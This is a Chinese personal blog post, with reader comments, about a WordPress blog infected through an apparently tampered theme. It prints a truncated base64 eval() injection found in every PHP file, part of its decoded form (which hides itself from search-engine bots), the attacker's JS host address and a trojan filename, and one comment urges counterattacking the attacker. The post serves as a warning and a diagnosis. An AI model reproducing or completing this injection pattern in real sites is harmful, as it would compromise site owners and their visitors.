安装东西要谨慎,小心博客中毒
最近10来天的时间,子猴博客每次打开页面的时候都会加载一个地址的js文件,如http://61.4.82.212/js.php,然后后台管理页面就非常混乱,很多功能用不了,几乎所有的浏览器在打开博客的时候都给予禁止的提示信息,给空间商去信,他们回复说这是因为网站感染了恶意软件(Malware),说没办法帮我,于是没有办法,我就去查网站的文件,后来在任一php文件中都查到了这样一段经过Base64编码后的病毒代码(原文件是没有这段代码的):
<?php /**/ eval(base64_decode("
aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25
vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21y
b2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGd
tbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSkQzQTdCOUUyOEMzNjl
GN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MD……………………………
"));?>
我将其解开后发现是一段类似javascript的代码:
if(function_exists(‘ob_start’)&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1; if(!function_exists(‘mrobh’)){ if(!function_exists(‘gml’)){ function gml(){ if (!stristr($_SERVER["HTTP_USER_AGENT"],”googlebot”)&& (!stristr($_SERVER["HTTP_USER_AGENT"],”yahoo”))){
。。。。。。。。
而且在主题根目录下还发现了一个名erwin_troy.php的木马文件,erwin的英文意思是“诊断”,而troy的英文意思是“木马”,里面也是一段经过编码后的代码。
后来没办法,我只好将所有的系统文件,除了图片目录外的都删除掉,然后再重传一遍wordpress的安装程序,之后,网站才恢复正常。
那么这个木马是怎么中的呢?我现在也记不得了,依稀记得是下载了一个主题包,然后试着安装了一下,后来不知道什么时候就中毒了,当然也不确定是因为那个主题的原因,但至少给了我一个教训,那就是在安装主题或插件的时候一定要到官方网站下载,即使一个原本没有问题的东西,但你如果不是在官方网站下载的话,有可能一些居心叵测之徒在其中加一些木马之类的东西。
希望各位朋友们以后在这方面以后也注意一下啊。
如无转载说明,则均为本站原创文章,转载请注明:来源:子猴博客
以后我也得小心点了,以后上传东西,最好到官方下载
是啊,这回真是把人弄得比较烦,所有东西都得重传,还要再重新设置
你该把这个留下来!下载一下他的马!看看什么网站来路!反攻一下!
暂时还没遇到这种情况,不过最近每天都有100多条垃圾评论。
好产品更要好广告 好产品更要好广告 好产品更要好广告 好产品更要好广告
说得很好
以后要注意了,病毒太烦了
我也被木马折腾过,以后要小心了。谢谢站长提醒啊
主要是我对病毒方面的技术没什么研究
这位朋友很幽默,那是个阿里妈妈的文字广告,我就那样挂着了,要不我还是挪个地方吧
嘿嘿,如果我遇到这样的问题还真没办法,大概要重新覆盖一些文件了。
在主题里面查这些乱七八糟东西的人真tm恶心!
的确是的,做这种事的人的确是相当地垃圾和令人恶心
一个houzi.in 一个zihou.me 哈哈
不过我现在上你的博,金山还有提醒。请你再检查!!
@梦之源泉
非常感谢,的确是又中了,我怀疑是不是博客所在服务器其他网站感染的
以后我也得小心点了,以后上传东西,最好到官方下载
不过我现在上你的博,金山还有提醒。请你再检查!!
,我怀疑是不是博客所在服务器其他网站感染的
网站安全一定要注意。